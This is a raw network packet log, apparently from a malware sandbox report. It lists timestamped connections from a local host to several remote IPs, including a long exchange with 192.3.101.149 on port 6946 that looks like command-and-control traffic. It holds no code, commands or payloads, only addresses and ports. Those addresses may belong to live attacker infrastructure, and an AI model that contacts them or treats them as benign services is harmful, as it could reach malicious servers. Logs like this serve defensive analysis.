                                                                                                                                                            Dec 13, 2024 07:38:41.181523085 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.187424898 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.187457085 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.187499046 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.187519073 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.187546968 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.187567949 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.194272041 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.194293976 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.194390059 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.194403887 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.194449902 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.194470882 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.199950933 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.199973106 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.200031996 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.200045109 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.200082064 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.200100899 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.205760002 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.205780983 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.205833912 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.205847025 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.205876112 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.205916882 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.213726044 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.213747025 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.213790894 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.213804007 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.213835001 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.213852882 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.214404106 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.214459896 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.214472055 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.214520931 CET44349740104.21.84.67192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.214570045 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.214879036 CET49740443192.168.2.4104.21.84.67
                                                                                                                                                            Dec 13, 2024 07:38:41.616480112 CET497416946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:41.736260891 CET694649741192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:41.736396074 CET497416946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:41.743664026 CET497416946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:41.863423109 CET694649741192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:42.861640930 CET694649741192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:42.909162045 CET497416946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:43.099333048 CET694649741192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:43.103554964 CET497416946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:43.223310947 CET694649741192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:43.223470926 CET497416946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:43.343291044 CET694649741192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:43.555231094 CET694649741192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:43.560422897 CET497416946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:43.680211067 CET694649741192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:43.747205973 CET694649741192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:43.758194923 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:43.796231985 CET497416946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:43.877918959 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:43.881001949 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:43.886094093 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:43.935272932 CET4974380192.168.2.4178.237.33.50
                                                                                                                                                            Dec 13, 2024 07:38:44.005827904 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:44.055279970 CET8049743178.237.33.50192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:44.055399895 CET4974380192.168.2.4178.237.33.50
                                                                                                                                                            Dec 13, 2024 07:38:44.058849096 CET4974380192.168.2.4178.237.33.50
                                                                                                                                                            Dec 13, 2024 07:38:44.179011106 CET8049743178.237.33.50192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:44.996007919 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.049735069 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:45.231590986 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.250507116 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:45.295350075 CET8049743178.237.33.50192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.295456886 CET4974380192.168.2.4178.237.33.50
                                                                                                                                                            Dec 13, 2024 07:38:45.345283985 CET497416946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:45.370227098 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.370290995 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:45.466820002 CET694649741192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.490086079 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.704459906 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.704525948 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.704536915 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.704564095 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:45.704651117 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.704663992 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.704694033 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:45.704833984 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.704843998 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.704858065 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.704868078 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:45.704905033 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:45.713083982 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.713196993 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.713244915 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:45.721705914 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.721795082 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.721834898 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:45.896784067 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.896821976 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.896882057 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:45.900501966 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.900594950 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.900640965 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:45.908504963 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.908618927 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.908673048 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:45.916589975 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.916712046 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.916763067 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:45.924488068 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.924590111 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.924658060 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:45.932486057 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.932596922 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.932648897 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:45.940495014 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.940615892 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.940669060 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:45.948513031 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.948803902 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.948856115 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:45.956486940 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.956527948 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.956582069 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:45.964560032 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.964664936 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.964710951 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:45.972508907 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.972707987 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.972753048 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:45.980492115 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.980582952 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:45.980628014 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.088272095 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.088488102 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.088601112 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.091613054 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.091761112 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.091811895 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.098131895 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.100512981 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.100593090 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.100610971 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.107105017 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.107166052 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.107194901 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.113821983 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.113876104 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.113934040 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.119669914 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.119729042 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.119885921 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.125560999 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.125664949 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.125718117 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.131625891 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.131685972 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.131699085 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.137476921 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.137579918 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.137656927 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.143419027 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.143538952 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.143551111 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.149717093 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.149784088 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.149836063 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.155339956 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.155457020 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.155508995 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.161250114 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.161359072 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.161410093 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.167231083 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.167346001 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.167397022 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.173192978 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.173284054 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.173336983 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.179131985 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.179250956 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.179305077 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.185339928 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.185405970 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.185458899 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.191009045 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.191167116 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.191221952 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.196948051 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.197073936 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.197123051 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.202821970 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.204986095 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.280073881 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.280177116 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.280234098 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.281517029 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.281636953 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.281688929 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.286398888 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.286508083 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.286804914 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.291281939 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.291358948 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.291656017 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.296037912 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.296108007 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.296212912 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.296267033 CET8049743178.237.33.50192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.296370029 CET4974380192.168.2.4178.237.33.50
                                                                                                                                                            Dec 13, 2024 07:38:46.300683022 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.300815105 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.300868988 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.305305958 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.305346966 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.305411100 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.309566021 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.309711933 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.309770107 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.313746929 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.313867092 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.313921928 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.317996025 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.318043947 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.318090916 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.322176933 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.322297096 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.322415113 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.326236963 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.326303959 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.326441050 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.330043077 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.330128908 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.330267906 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.333939075 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.334043026 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.334094048 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.344758034 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.344877958 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.344901085 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.344918013 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.344942093 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.344963074 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.347973108 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.348092079 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.348160982 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.350708961 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.351006985 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.351064920 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.353615046 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.353698969 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.353862047 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.357243061 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.357312918 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.357364893 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.361099958 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.361218929 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.361263037 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.365053892 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.365191936 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.365245104 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.368906975 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.369055033 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.369107962 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.372992039 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.373070002 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.373123884 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.376797915 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.376991987 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.377043009 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.380559921 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.380682945 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.380738974 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.384435892 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.384633064 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.384684086 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.388329983 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.388463020 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.388515949 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.392345905 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.392447948 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.392504930 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.396107912 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.396203041 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.396261930 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.399930954 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.400082111 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.400141001 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.403994083 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.455952883 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.471993923 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.472198009 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.472261906 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.473392963 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.473490000 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.473545074 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.476273060 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.476407051 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.477433920 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.479096889 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.479234934 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.480328083 CET497426946192.168.2.4192.3.101.149
                                                                                                                                                            Dec 13, 2024 07:38:46.481957912 CET694649742192.3.101.149192.168.2.4
                                                                                                                                                            Dec 13, 2024 07:38:46.482044935 CET694649742192.3.101.149192.168.2.4
